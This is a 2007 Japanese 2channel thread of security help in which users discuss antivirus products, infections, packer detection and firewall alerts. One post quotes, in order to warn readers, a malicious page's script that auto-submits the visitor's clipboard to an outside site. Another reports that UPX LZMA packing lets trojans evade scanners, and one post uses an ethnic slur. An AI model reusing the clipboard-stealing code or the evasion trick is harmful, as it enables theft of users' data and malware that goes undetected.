07/05/02 14:33:59
>25
これは恥ずかしい(^^ゞ anti のAでした。 A/Vでした。
>32
なぜ?と思いましたが、結果的に宣伝になってしまうんですね。
でも精度の高い情報が欲しかったのです。
>28 29さん
一通り拝見させていただきました。
今使ってるものは VB2007 McA2007 Norton I/S2005
動作マシンスペックに依れど、或いは使わないものは切り捨ててもどれも軽快な感じは受けません。
更に環境内容に因っても体感的に変わってくるのかも知れませんね・・・
やはり素人使用に於いては検出力、防御力などが優れているものは重くなってもしょうがない、
それを回避するならば高スペックのPCに変えるのが得策と考えるべきでしょうか。
40:名無しさん@お腹いっぱい。
07/05/02 14:49:37
>>39
同じようなスペックだけどNIS2005からKIS6に乗り換えたら軽くて驚いた。
41:24 27 31 39
07/05/02 14:57:21
>>40
KIS6とはカスペでしょうか。
論より証拠 やはり一度使ってみてからでしょうか。
その上でまた不満があればいろいろ模索してみようと思います。
というか体験版があったような気がしますのでそれで様子を見てみます。
ご助言感謝します。
42:名無しさん@お腹いっぱい。
07/05/02 15:16:54
と、幼稚な自演で取り繕おうとする劇団ひとりでしたw
43: ◆N9P3SuvBPo
07/05/02 17:56:16
明日から連休だ~
テンプレ貼ってくれた人お疲れ様。
>24
本当はセキュ質スレ向けの質問なんだけど…まあ
>【使用OS】 XP SP2 P4 2GHz-M 512GB
メモリが512GBってw、512MBだよな。
それで、アンチウイルス(総合型セキュリティソフト)を入れると、モッサリするってね。
常駐型セキュリティソフト入れれば重くなるのは当たり前だ。
>尚UV機能とFW機能のみ実装で設定はデフォとして。
必要最小限の機能で使うのなら今のメモリでも問題無いんだけど、
デフォルトの設定だとな~…やっぱり、メモリを増設するしかないかもな。
俺だったら、必要の無い常駐ソフトやサービスを無効にするな。
44:名無しさん@お腹いっぱい。
07/05/02 18:26:10
URLリンク(gigazine.net)
悪意あるソフトの80%はアンチウイルスソフトが効かない
これ見るとウィルスソフトなんてどれでもいいって気になるw
45:名無しさん@お腹いっぱい。
07/05/02 21:58:36
QuickTime7.1.6出てるな
46:名無しさん@お腹いっぱい。
07/05/02 22:00:32
というか端から思ってたけど、デジタルで完璧なんてありえんよね
個人情報保護なんて建前だけでダダ漏れでしょw
そもそもアンチウイルスソフトすらまともに入れていない一般人が多いんじゃないかな
だいたいでなんとかカワセんじゃねか 運次第w
47:名無しさん@お腹いっぱい。
07/05/02 22:36:33
「TROJ_VB.CZJ」
こんな名前のウイルスに感染したようです。
何か情報あったら教えて。
48:名無しさん@お腹いっぱい。
07/05/02 22:55:38
>>47
つURLリンク(www.trendmicro.co.jp)
49:名無しさん@お腹いっぱい。
07/05/02 23:22:25
>>48
ありがとう。
んんん何がどーなるのか、どーすればいいのか、
わからん。
50:名無しさん@お腹いっぱい。
07/05/02 23:31:16
多分こうじゃないか
1.アップデートでVBを最新
2.スキャンで感染したファイルを特定
3.タスクマネージャのプロセスからマルウェアを終了
4.感染したファイルを削除
51:名無しさん@お腹いっぱい。
07/05/02 23:37:38
1.アップデートでVBを最新
avast・ノートンの最新にはありませんでした。
2.スキャンで感染したファイルを特定
ウイルスバスター オンラインスキャンでファイル名がわかりました。
3.タスクマネージャのプロセスからマルウェアを終了
4.感染したファイルを削除
どうやるんですか?
本当にわかりません。
52:名無しさん@お腹いっぱい。
07/05/02 23:39:49
書き忘れました。
ウイルスバスターでの対処法は英語のみでわかりませんでした。
53:名無しさん@お腹いっぱい。
07/05/02 23:47:45
Windows 98、MEなら
CTRL+ALT+DELETE
Windows NT, 2000, XP, Server 2003なら
CTRL+SHIFT+ESCと書いてあるけどウチのXPでは起動しなかったので
CTRL+ALT+DELETEでタスクマネージャを選択してプロセスタブ
イメージ名をクリックするとABC順に並んで見やすくなる
この中にあってはならないプロセス(マルウエア)があったら終了させる
どれがマルウェアかは俺にも分らんがw
感染ファイル削除もVB上で行うのかエクスプローラから削除するのかも分らん
と言うことでVBからの削除が出来なかったらエクスプローラからの削除を試みれば?
54:名無しさん@お腹いっぱい。
07/05/03 00:38:39
ありがとうございます。
エクスプローラから削除してみます。
55:名無しさん@お腹いっぱい。
07/05/03 13:56:05
Trend Flex Security オンラインスキャンを実行したところ
TSPY_Banker.BF というスパイウェアが検出されましたが、
どのファイルがスパイウェアなのか表示されませんでした。
スパイウェアのファイル名を知る方法はありませんか?
56:名無しさん@お腹いっぱい。
07/05/04 21:42:15
別にウイルスというほどのものではないが、
3台のPCのうち2台のPCのキーボードがいつの間にか106タイプじゃなくなっていて、日本語タイプの時に多少支障が出た。
ドライバ変更で対処しようとしたが、かたや106がリスト表示になく、もう一つは変更してもダメだった。
しかたなくレジストリから変更をやってみようとして、エディタを開き該当フォルダ内を見てびっくり。
「LayerDriver JPN」の他にもう一つ「LayerDriver KOR」が存在した。よく調べりゃ3台全部に。
こんなところに糞コリアンが隠れていようとは・・・レジストリに寄生するゴミなので早速削除。
まったく油断も隙もない。
57:名無しさん@お腹いっぱい。
07/05/04 23:15:53
で?
オチは?
58:名無しさん@お腹いっぱい。
07/05/04 23:29:50
【使用OS】xp
【Microsoft Updateの状態】 最新
【使用セキュリティソフトとバージョン】 ノートン2005 ver最新
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 最新
【スパイウェア対策ソフト】 ad-aware
【スパイウェア対策ソフトの更新は定期的に行なっているか】 最新
【ルータの有無】 なし
【症状】 定期的にdrive cleanerの宣伝告知がアラート音と共に表示され、たまに海外サイトのエロHPが表示されて困ってます。
アンチスパイウェアで掃除しても定期的にスパイウェアが放り込まれてキリがありません…。
ウイルスソフトで駆除も行った所、色々見つかったので削除したんですが、kbdcui.dllがtrojan horseに感染しているらしく、先生でも検疫できず、セーフモードで削除しようとしても削除できませんでした。
検索しても対処法が見つからずに困っています。どなたか退治法を教えていただけないでしょうかorz
59:名無しさん@お腹いっぱい。
07/05/04 23:37:26
書き忘れ…フルパスはC:\WINDOWS\system32\kbdcui.dll です
WinAntiVirus PROの広告が表示されるのも忘れてましたorz
60:名無しさん@お腹いっぱい。
07/05/04 23:40:35
>>58
WinAntiVirus PROで・・・
定番過ぎて
61:名無しさん@お腹いっぱい。
07/05/04 23:48:02
定番すぎでしたか…
drive cleanerもWinAntiVirus PROも警告が怪しすぎたのでダウンロードもインストもしなかったんですが…
過去ログも見れないし…リカバリしかないんですかね…orz
62:名無しさん@お腹いっぱい。
07/05/04 23:48:42
>>58
こっちが専用スレ
スレリンク(sec板)
63:名無しさん@お腹いっぱい。
07/05/04 23:53:10
>>61
adだけなのぉてspy-botやら
他のでも試し、
ほんでな、システムの復元は切っとかんと
復活しよるもんもあるで
まぁ、削除後は怪しげな単語で検索してみ
あったら手動で削除
気ぃ落とさんと気長にやり
64:名無しさん@お腹いっぱい。
07/05/04 23:56:34
kbdcui.dllがトロイっぽかったのでこっちかと思いました…
誘導感謝ですm(_ _)m
65:名無しさん@お腹いっぱい。
07/05/04 23:57:43
>>62 >>63
他のソフトでも試してみます。重ね重ねありがとうございましたm(_ _)m
66:名無しさん@お腹いっぱい。
07/05/05 00:03:41
ファイル消せないだけならunlockerで大抵のものは消せると思うけど
URLリンク(xp-delete.hp.infoseek.co.jp)
あとvundo fix を試す
URLリンク(www.higaitaisaku.com)
xpをsp2にしてMS update
できればルーターもいれといたほうがいい
67:名無しさん@お腹いっぱい。
07/05/05 00:09:04
>>58
Symantec - サポート
URLリンク(www.symantec.com)
■ウイルスとリスク (スパイウェア & ウイルス駆除の相談)
68:名無しさん@お腹いっぱい。
07/05/05 00:40:37
>>58
2005はスパイウェアを検出できても駆除は無理だよ
69:名無しさん@お腹いっぱい。
07/05/05 03:14:14
質問です。データー等開く時にウイルスがあるかないか自動的にやってくれるソフトはありますか?
70:名無しさん@お腹いっぱい。
07/05/05 14:31:19
普通のアンチウイルスソフトはみんなやってることだが
71:名無しさん@お腹いっぱい。
07/05/05 22:07:55
virustotal uploader
URLリンク(blog.hispasec.com)
これいいわ
インストすると右クリ→送る からvirustotalへ直行する
下手なウイルススキャンよりいいかも
しかしvt更に重くなるんだろなw
72:名無しさん@お腹いっぱい。
07/05/05 22:18:17
お前んちのパソコンも無駄に重くなるしな
73:名無しさん@お腹いっぱい。
07/05/05 22:19:20
入れなくていいよ
74:名無しさん@お腹いっぱい。
07/05/06 02:37:03
UPX3.00が出ていたのでちょっと確認してみた。
手持ちの既知の無圧縮トロイをオプション無しで固めて検知を確認した後
3.00(厳密にはベータの2.90)で新設されたLZMA(--lzmaオプション)で固めると
検知しなくなる製品がいっぱいある…。
Packerの識別と解凍はエンジン側に手入れしなきゃだめかもね。
75:名無しさん@お腹いっぱい。
07/05/06 02:41:56
解凍すれば検知するのだからあまりどうでもいい
VirusTotalに突っ込んでその結果が絶対だと思ってるアホどもを騙すには丁度良いが
76:名無しさん@お腹いっぱい。
07/05/06 03:13:48
パッカーとかステルスじゃねえし
77:名無しさん@お腹いっぱい。
07/05/06 03:32:42
>>75
VirusTotaはパッカー表示されるだろうがハゲ
78:名無しさん@お腹いっぱい。
07/05/06 03:35:09
>>77
馬鹿は発言しなくていいよ。
79:名無しさん@お腹いっぱい。
07/05/06 04:22:46
>>74
検知しないからと言って困る状況がほとんどない
未対応のPackerで固められた、その出所不明のファイル自体がすでに胡散臭い怪しい存在
そんなファイルがオンデマンドで検知されなかったからと言って、実行もされずにその後どうされるのやら
80:名無しさん@お腹いっぱい。
07/05/06 05:51:10
WinnyとかのUploadフォルダに突っ込んでしばらくニヤニヤできる
81:名無しさん@お腹いっぱい。
07/05/06 06:15:27
>>78
>>78
82:名無しさん@お腹いっぱい。
07/05/06 20:41:23
問題はマルウエア自身が毎回異なるUPX圧縮をして自身を変化させるタイプだな
まぁ、そんなのに感染したら素直にリカバリしてしまえばいいんだが
83:名無しさん@お腹いっぱい。
07/05/06 21:24:33
UPXの実行時解凍はファイルが作成されるわけではない
メモリ上で行われるから検知出来ないか出来ても後の祭り
84:名無しさん@お腹いっぱい。
07/05/06 21:44:47
ほとんど脅威に感じない
85:名無しさん@お腹いっぱい。
07/05/06 22:12:25
>>83
アホか
一度自分でやってみろ
86:名無しさん@お腹いっぱい。
07/05/07 10:42:36
>>83
ボンバー型のトロイはそうだが、大概のマルウエアは常駐ファイルを生成するから
それに反応するはず。それが>>82だったらアウトだけどな
87:名無しさん@お腹いっぱい。
07/05/07 19:19:52
ねむい氏
More優しく!
88:名無しさん@お腹いっぱい。
07/05/07 21:38:51
>>83
普通の使い方をしてたらEXEを踏むことはまずない
脆弱性だけ注意していたらいいと思う
89:名無しさん@お腹いっぱい。
07/05/07 21:44:09
お前は踏まないんだろうが
もらいもんのzipで踏んづけた > たすけて~ドラえも~ん なやつなんて結構いるだろが
90:名無しさん@お腹いっぱい。
07/05/07 22:17:45
>>89
あと割れの「エロゲ.exe」とか簡単に踏むやつ多いよなwwwwww。
やっぱ人につけいるならエロからだろ。
91:名無しさん@お腹いっぱい。
07/05/07 22:18:45
確かにIexplorer.exeのフォルダにUPX圧縮されたWS2_32.DLLのフック版を落とされたら終わりだな
92:名無しさん@お腹いっぱい。
07/05/07 23:00:26
もらいもんのウイルスってなんだよ
馬鹿と関係を持った自分の頭の悪さを嘆け
93:名無しさん@お腹いっぱい。
07/05/07 23:14:26
そういうのを見かけるって話だけど書き方が悪かったすかね
94:名無しさん@お腹いっぱい。
07/05/07 23:16:35
精神がウイルスに侵されてる奴はスルーしとけ
95:名無しさん@お腹いっぱい。
07/05/07 23:20:44
>>93
別にお前さんに言うとらん
そんな馬鹿の例など挙げるだけ無駄という話だ
八割方違法物だろ、むしろ引っかかって感染しろ
96:名無しさん@お腹いっぱい。
07/05/07 23:27:54
小学、中学ぐらいの年代はアプロダへのリンクで踏んじゃう
疑うことを知らないからな
97:名無しさん@お腹いっぱい。
07/05/08 00:29:40
>もらいもんのzipで踏んづけた > たすけて~ドラえも~ん なやつなんて結構いるだろが
結構いるかどうかは分からないが、いるかもしれないな。
だからなんだ。
98:名無しさん@お腹いっぱい。
07/05/08 00:31:54
感じるんだ
99:名無しさん@お腹いっぱい。
07/05/08 00:34:30
なんだそれ。 つか原田君いるかね
100:名無しさん@お腹いっぱい。
07/05/10 17:06:07
■新種ウイルス発生なのでご注意■
感染したPCをbot化すると思われる新種ウイルスが見つかってます。
これを検出できるアンチウイルス製品が完全に出揃っていないのでご注意ください。
無料アンチウイルスでは、BitDefender、AVG、AntiVir、Avastなどが検出できます。
有料アンチウイルスでは、McAfee、Kaspersky、F-Secureなどが検出できます。
NOD32やMicrosoft製アンチウイルスなどは、まだ検出できないので、特にご注意ください。
検出できる製品は赤字で検出名が表記されています(URLリンク(www.virustotal.com)による検証)。
URLリンク(vista.crap.jp)
101: ◆N9P3SuvBPo
07/05/10 18:25:31
スレ立て10日目でやっと100レスですか。
セキュ質スレでは大体10日前後で次スレですが…
まったり行きますか。
102:名無しさん@お腹いっぱい。
07/05/10 18:40:37
スレの特色が薄いんじゃない
>>1がイキナシもうテンプレだし
それ以降のテンプレはゴチャゴチャだし
103:名無しさん@お腹いっぱい。
07/05/10 19:23:11
テンプレもいまどきBlasterとかいらんだろ
104:名無しさん@お腹いっぱい。
07/05/10 21:44:42
*水曜日のWindowsUpdate更新プログラムについての不具合(>>335の追記)
427 名前:名無し~3.EXE[sage] 投稿日:2007/05/09(水) 22:29:25 ID:nDIeetqy
今回のパッチ、更新検索中に、WinXP+Office2003の環境で異様に重くなる場合あるそうな。
MSでも原因不明。svchostの奴で多少はましになるけど、責任は知らん、Officeを2007かXPにしろ
というお達しが、うちの会社で出た。
435 名前:名無し~3.EXE[sage] 投稿日:2007/05/10(木) 00:12:29 ID:FEz1XhvZ
WinXP+Office2003の環境で重くなる件について
うちの会社ではsvchostの奴をやって
Windows Updateのページに行って、左のメニューから「設定の変更」へ行き
「Windows Update をしない」みたいのを選んだら直った。
(適用したら見えなくなったので正確な名称じゃないかも)
システムのプロパティ内「自動更新を無効にする」にチェックして適用+OKクリック。
その後、WindowsUpdateのサイトで手動ダウンロード&インストールする。
ADSL回線や光回線でもこの現象が見られるという報告があがってます。
WinXP+Office2003の環境の人は気をつけてください。
*この文章を該当しそうなスレッドにコピペしてください。
よろしくお願いしますm(_ _)m
105:名無しさん@お腹いっぱい。
07/05/10 22:20:17
今頃言われてもなぁ
異様に重かったのは、やっぱ異常だったんか
106:名無しさん@お腹いっぱい。
07/05/10 22:35:54
Win板のUpdate失敗スレ見ろよ…
107:名無しさん@お腹いっぱい。
07/05/12 00:16:23
HPにgoogleを登録していたのですが、いつのまにかbiglobeに変わっていました。
ウィルスかなにかに感染してしまったのでしょうか・・・?
108:名無しさん@お腹いっぱい。
07/05/12 02:18:01
>>107
戻らないってことならNECサイトだか121だかに
対処方法が書かれていたと思う
109:名無しさん@お腹いっぱい。
07/05/12 05:50:45
【使用PC】 「SONY VAIO JX」
【使用OS】 「Windows XP (VAIO付属のもの)」
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「AVAST4.7 Home Edition」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「最新」
【スパイウェア対策ソフト】 「なし」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「なし」
【ルータの有無】 「有」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「なし」
【どんな症状が出るか】 「スピーカーから不定期に『くしゃっ・・・くしゃっ』という音が出ます。年に数回OSを入れなおしますが、いつの間にか音が出ています。どなたかお分かりの方いらっしゃいませんか?」
110:名無しさん@お腹いっぱい。
07/05/12 06:25:39
ウイルスとか関係ねーし。
ハード(ノイズ拾ってるなど)やドライバの問題だろ。
PC一般板のVAIOスレにでも行け。
111:名無しさん@お腹いっぱい。
07/05/12 10:35:12
VAIO(笑)
112:名無しさん@お腹いっぱい。
07/05/12 12:44:11
>>109
ああ、それはウィルスで間違いないよ。
すぐに病院行って抗生剤もらってこい。
113:名無しさん@お腹いっぱい。
07/05/13 02:01:18
URLリンク(ime.nu)
これウイルスらしいんだけど、どんなウイルス?
114:名無しさん@お腹いっぱい。
07/05/13 03:07:16
programfilesの中身がどんどん消されていくウイルスって最近報告ありました?
ウイルスバスターにもonecareにも引っかからないみたい。
115:名無しさん@お腹いっぱい。
07/05/13 03:15:21
>>114
whiter ならダウンロード板かな?
116:名無しさん@お腹いっぱい。
07/05/13 04:15:36
>>113
ime.nu外せ。鑑定は初級ネット板でどうぞ。
>>114
原田じゃねーの? >>13
117:名無しさん@お腹いっぱい。
07/05/13 10:47:50
スレリンク(sec板:273-278番)
118:名無しさん@お腹いっぱい。
07/05/13 12:54:57
>>114
ウイルスバスターとonecareを信用してるようじゃね・・・
119:名無しさん@お腹いっぱい。
07/05/13 15:28:43
>>108
エスパー発見
120:名無しさん@お腹いっぱい。
07/05/15 00:47:37
失礼します。ちょっと質問させてください。
以前ウイルスに感染しました。
最新アップデートを行ったAVGとspybot両方でフルスキャンを通常状態とセーフモードで
かけたところとりあえず症状は出なくなりましたが、その頃から
インターネットエクスプローラーの
ツール→インターネットオプション→プライバシーの
cookieの設定を中などに設定してもしばらくすると勝手に低(すべてのcookieを受け入れる)
に変わってしまうようになりました。これはウイルスかスパイウェアの活動によるものでしょうか?
詳しい方のアドバイスお願いします。
以下補足ですが、
ウイルス感染中に
c\windowsフォルダ内に
*****.exe(5桁の数字)
eraseme_*****.exe(同上)
が複数増殖してAVGがたまにその一部を削除していく、
という症状が出ていました。
また、ダイアラー(delsim ダイアラ)が勝手に立ち上がったり
インターネットエクスプローラーが勝手に立ち上がり広告サイトが
勝手に開くこともありました。
OSはウィンドウズ2000、
使用しているウイルス対策ソフトはAVG、
スパイウェア対策はspybot-Search & Destroy
です。
121:名無しさん@お腹いっぱい。
07/05/15 01:17:09
>>120
スパイウェアの中にはブラウザの設定を落として、
次々と他のスパイウェアを呼び寄せる悪質なのがあります
122:名無しさん@お腹いっぱい。
07/05/15 01:21:55
2000でFW無しなのかねえ
とりあえず>>9ぐらいやれと。
123:名無しさん@お腹いっぱい。
07/05/15 19:48:33
こんばんは。
セキュリティソフトがIPを遮断しますか?と出たIPを調べたら
URLリンク(www.apnic.net)
から何回もアクセスされていました。
このサイトはどんな機関なのでしょうか?
わかる方、教えてください。
124:名無しさん@お腹いっぱい。
07/05/15 19:51:31
123ですが、表示されていたIPは125.54.39.204です。
よろしくお願いします。
125:名無しさん@お腹いっぱい。
07/05/15 19:53:10
KD125054039204.ppp-bb.dion.ne.jp
126:名無しさん@お腹いっぱい。
07/05/15 20:11:41
>>123
俺も以前そこから執拗なアクセスされたことある。
全部ルーター&FWが弾いたけど、何回もしつこいよな
うちはガード固いんだから、とっとと諦めろって言ってやりたい
なんなんだ?APNICって
127:名無しさん@お腹いっぱい。
07/05/15 20:40:14
もしかして釣り? それともボケ?
128:名無しさん@お腹いっぱい。
07/05/15 21:09:47
最近しばしばshare のdown フォルダにPrevHost というフォルダと、その中にindn.dat というファイルが自動で生成されることがあります。
ググっても、share の質問スレで聞いても回答が得られなかったのですが、何だか分かる方いましたら教えてください。
129:123
07/05/15 21:50:07
>>127
IDが変わっていますが123です。
釣りでもないし、ボケているつもりもありません。。
さっきから同じような感じで6回もアタックされました。
こんな事は初めてで何かわかりません。
これは一体何なのか教えていただけますか?
130:名無しさん@お腹いっぱい。
07/05/15 22:50:53
APNICは君が逆引きで調べたWhoisそのもの
ちなみにそのIPはKDDI(DION) >>125
131:名無しさん@お腹いっぱい。
07/05/15 23:00:47
じゃあAPNICからアタックがあったポートは
別に開放しちゃっても問題ないんですか?
132:名無しさん@お腹いっぱい。
07/05/15 23:03:47
だからAPNICからアタックされてるんじゃないって
アッタクしてるのはどっかの感染者か踏み台にされてるPC
133:名無しさん@お腹いっぱい。
07/05/15 23:08:19
言い忘れたけどそういうアタックは日常茶飯事的にある
うちもルーターのログを見ればいっぱいあるから
134:名無しさん@お腹いっぱい。
07/05/15 23:09:31
なるほど。なんとなく理解できました。
安心しました。ありがとうございました。
135:123
07/05/16 00:20:14
123です。
皆さん、丁寧に教えて下さってありがとうございました。
私も一安心しました。
ファイヤーウォールのソフトにも感謝して寝る事にします。
おやすみなさい。
136:名無しさん@お腹いっぱい。
07/05/17 14:35:38
age
137:名無しさん@お腹いっぱい。
07/05/17 17:40:01
【使用OS】 「WindowsXP」
【使用セキュリティソフトとバージョン】 「NTTセキュリティ対策ツールver15」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「最新です」
【スパイウェア対策ソフト】 「NTTセキュリティ対策ツールver15」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「しています」
【ルータの有無】 「有」
【スキャンの結果何が検出されたか】
・TSPY_Backdoor
・検出リソース→ C:WINDOWS\system32\drivers
・検出対象→Zcsfzdjh.sys
検出して削除はしたのですが、トロイの木馬として検出されたので
まだ不安です。ぐぐってみてもバックドアは色んな種類が居て、どんな悪さをするのかよく解りません。
TSPY Bsckdoorで検索をかけてみましたが、見つけられませんでした。
対処はこれでよかったのか、それとどんな症状が出るのか教えて欲しいです。
PC初期化したほうがいいんですかね・・?
138: ◆N9P3SuvBPo
07/05/17 18:06:34
>137
不正ドライバか?
>Zcsfzdjh.sys
削除したんなら問題ないと思うけどな…
139:名無しさん@お腹いっぱい。
07/05/17 20:52:46
Zcsfzdjhでファイルとレジストリ検索しといたほうがいいんじゃね
140:名無しさん@お腹いっぱい。
07/05/18 07:14:21
ありがとうございます。
ファイル検索では引っかかりませんでした。
レジストリ検索っていうのは、ぐぐったら出てくるレジストリ検索のソフト使えばいいのかな?
あと、一応ネット通販とかのパスワードを変更しておいたほうがいいですかね?
141:名無しさん@お腹いっぱい。
07/05/18 11:31:04
>レジストリ検索
俺はこれを愛用してる
RegGlass
URLリンク(hp.vector.co.jp)
142:名無しさん@お腹いっぱい。
07/05/18 15:50:12
只今ノートンスレにて炎上中の話題。
昨夜の定義ファイル更新でBackdoor検出。
Backdoor_Haxdoor: 「c:\WINDOWS\sysytem32\drivers\CO_Mon.sys」
「シマンテックのオンラインスキャンでウイルス検出を実行した際にダウンロードされるCO_Mon.sysで
Backdoor.Haxdoorが検出される。」
「シマンテックのオンラインスキャン以外にもCO_Mon.sysが入る経路があるのかも知れん」
感染経路は?本当にBackdoor?等、いまだに詳細は不明。
【ノートン】インターネットセキュリティ Ver.113【2007】
スレリンク(sec板:486番)
143:名無しさん@お腹いっぱい。
07/05/18 16:09:53
騒いでるの一人だけじゃん…。
普通にどこかで踏んだんだろ。
144: ◆N9P3SuvBPo
07/05/18 18:34:13
>142
誤検出だったという展開になってるようだけど。
c:\windows\ntbtlog.txtに
「Loaded driver \SystemRoot\System32\Drivers\CO_Mon.sys」が
存在しないか確認を。無いと思うけどね。
145:名無しさん@お腹いっぱい。
07/05/18 20:18:02
ほんとにhaxdoorだったらえらいこっちゃ
146:名無しさん@お腹いっぱい。
07/05/18 20:38:30
Rootkitだもんな
147:名無しさん@お腹いっぱい。
07/05/18 21:26:22
>144
そのc:\windows\ntbtlog.txtってなんなの?
spybotがいつも反応するんでセーフモードで消したけど、すぐ復活するし。
頭にきてOS再インスコしたけどたかまた出てくるんだが。
148: ◆N9P3SuvBPo
07/05/18 21:32:10
>147
ブートのログ
起動時に読み込まれた(または読み込まれなかった)ドライバが表示される
F8起動オプションの、セーフモードで起動した時や、
「ブートのログ作成を有効にする」を選んで起動した時に作成される。
(一旦作成してしまうと、起動する度に内容が追記されてサイズが増えて行く)
149:名無しさん@お腹いっぱい。
07/05/19 13:25:36
すまんタスクマネージャーにtgui.exeってのとtgsvc.exeっていうのが急に出現してメモリ使いまくってるんだがこれってなんなのかわかる奴いない?
最近ウィルス踏んだばっかりだから気になるんだが…
150:名無しさん@お腹いっぱい。
07/05/19 13:32:12
>>141
ありがとうございました。
何も引っかかりませんでした。
これで一安心なのかな・・?
アドバイスくれた皆様、ありがとうございました~
151:名無しさん@お腹いっぱい。
07/05/19 14:31:03
>>149
検索すらしないのかよ
152:名無しさん@お腹いっぱい。
07/05/19 15:07:48
>>151
だからみんなスルーしてるだろ
153:名無しさん@お腹いっぱい。
07/05/19 15:37:55
了解。
154:名無しさん@お腹いっぱい。
07/05/19 15:51:10
人
~( ○)
(_ ゚T゚
゚ ゚̄
155:名無しさん@お腹いっぱい。
07/05/22 12:58:56
URLリンク(omanchin.com)
これってどういうものですか?
ノートンが反応するそうです。
解説お願いします。
156:名無しさん@お腹いっぱい。
07/05/22 13:07:36
>>155
クリップボードのデータを盗まれたお・・おっおっおっ
157:名無しさん@お腹いっぱい。
07/05/22 13:07:42
>>155
これ、JPGじゃねーよ。
158:名無しさん@お腹いっぱい。
07/05/22 13:11:52
>>155
※ clipboardData.getDataが使われているようです。
以後こちらへどうぞ
勇気がなくて踏めない人のための鑑定スレPart14
スレリンク(hack板)
159:名無しさん@お腹いっぱい。
07/05/22 13:16:14
DR,webもブラクラチェックも大丈夫そうだが、
チキンな俺は踏まない。
つか、>>155危険なリンク貼るな。スレ違いだボケ
専ブラで画像自動表示してる人だっているんだから、
少しでも危険なリンク貼るならht位まで消してから貼れ。今度やったら通報する。
160:名無しさん@お腹いっぱい。
07/05/22 13:25:48
>>155
※ clipboardData.getDataが使われているようです。
161:名無しさん@お腹いっぱい。
07/05/22 13:43:03
<form method="post" name="bbs" action="URLリンク(omanchin.com)
<input type="hidden" name="paste" value="">
<INPUT type="hidden" name="k" value="あ">
<INPUT type="hidden" name="chktime" value="1179759460">
<INPUT type="hidden" name="title" value="">
</form>
<script type="text/javascript">
<!--
document.bbs.paste.value = clipboardData.getData("Text");
document.bbs.submit ();
// -->
</script>
クリップボードのデータを送信しちゃいますよ~って。
162:名無しさん@お腹いっぱい。
07/05/22 13:49:18
「このWebページがクリップボードへアクセスするのを許可しますか?」→「許可しない」
さすがIE7、なんともないぜ。
163:名無しさん@お腹いっぱい。
07/05/22 13:51:05
クリップボードのデータ送信されたら
あんなエロイ事や、こんなエロイ事を検索したのがバレちゃうじゃんか!!111!!!1
164:名無しさん@お腹いっぱい。
07/05/22 13:52:15
ウイルスコードをクリップボードにコピーして踏めばいいんじゃね?
165:名無しさん@お腹いっぱい。
07/05/22 13:55:06
>>164
w
166:名無しさん@お腹いっぱい。
07/05/22 13:56:34
>>159
馬鹿ですか?
聞くまでもなく馬鹿ですよね
167:名無しさん@お腹いっぱい。
07/05/22 14:04:03
clipboardData.getDataって取得できるサイズに制限無いの?
50MBのテキストコピーして踏んでみたが、ちゃんと送信されてるっぽい。
168:名無しさん@お腹いっぱい。
07/05/22 14:07:36
あ、違った。5MBだった。
169:名無しさん@お腹いっぱい。
07/05/22 14:12:45
制限無いんじゃね?
メモリ食いつぶすまで行けると思うが、先にクリップボードが死ぬかと。
170:名無しさん@お腹いっぱい。
07/05/22 15:33:31
>>159
何でお前がこのスレにいるのか分からない。
チキンで踏めもしないのに、此処でグダグダ言うお前って何様?
171:名無しさん@お腹いっぱい。
07/05/22 15:35:59
> 専ブラで画像自動表示してる人だっているんだから、
こんな人もセキュやってるんだと思うと笑えてくるよな
pink板へ逝けよ
172:名無しさん@お腹いっぱい。
07/05/22 17:16:36
いきなりブラクラもどき貼る馬鹿よりマシじゃねw
173:名無しさん@お腹いっぱい。
07/05/22 17:19:41
>>155
通報しますた
174:名無しさん@お腹いっぱい。
07/05/22 17:35:43
>>155
じゃあ俺も通報しとくわ
175:名無しさん@お腹いっぱい。
07/05/22 17:39:40
じゃあ有名な奴を直リンで
URLリンク(www2.strangeworld.org)
176:名無しさん@お腹いっぱい。
07/05/22 17:42:32
アク禁になるぞ
177:名無しさん@お腹いっぱい。
07/05/22 18:26:01
アク禁になるだけならまだいいけど、
2ちゃんからプロバイダに連絡行って強制解約になったやつもいるからな
匿名でID出ないからって、あんまり調子に乗ってウイルス貼るのはやめたほうがいい
178:名無しさん@お腹いっぱい。
07/05/22 18:30:33
ゆとり君はほっとけ
179:名無しさん@お腹いっぱい。
07/05/22 18:44:33
とりあえず>>175は通報してアク禁にしちゃいましょう^^
180:名無しさん@お腹いっぱい。
07/05/22 19:14:27
>>155は
URLリンク(omanchin.com) ここの点呼みたいだけどな。
181:名無しさん@お腹いっぱい。
07/05/22 19:27:35
まぁ、なんでもいいけど、訳分からんスレ違いなものを貼るな禿って事だな
182:名無しさん@お腹いっぱい。
07/05/23 23:15:26
愚問かも知れないが教示頂けませんか?
1、LANネットワークを共有するウィルス・スパイウェアの存在の有無
2、A─B環境で、AにあるウィルスをBから起動させると感染するのはA?B?両方?
183:名無しさん@お腹いっぱい。
07/05/23 23:40:41
>>182
1 : 共有の意味がよくわからないけど、以前問題になったMSBlustは、ローカルエリア
内のほかのコンピュータに感染する動作をしていた。また、共有フォルダを破壊、改変する
タイプもある。
2 : なぜAにウイルスがあるのかが問題。Aがすでにウイルスに感染している可能性も
ある。そうでなければ、Bから起動させた場合、通常感染するのはBだけ。ただし、Aにい
ファイアーウォールソフトがなければ、場合によってはその後Aに感染するリスクはある。
上に書いたような共有フォルダを破壊するようなタイプなら被害はBにも及ぶかもしれない。
いずれにしてもウイルスの挙動は千差万別で、一般論は通用しないので注意してほしい。
184:182
07/05/23 23:54:37
>>183
レス感謝です 説明が下手で申し訳ないですが
一応把握しました
1、はAが感染していたらBも感染するか聞きたかったんです
2、は「千差万別」=「する物もある」で理解しました
>なぜAにウイルスがあるのかが問題
ウィルスと確定した訳では無いのですが
単に「不明なファイル」があると言うことです
185:名無しさん@お腹いっぱい。
07/05/24 12:00:02
JAVAアプレットを立ち上げるとIEが原因でkernel32.dllにエラーが・・・
とでて、強制終了させられます。
avastのフリーソフトでウイルス駆除したのですが改善されません。
システムのなかにjacbgage.dllという不明なものもありました。
どうしたらいいでしょうか・・・・
186:名無しさん@お腹いっぱい。
07/05/24 23:09:22
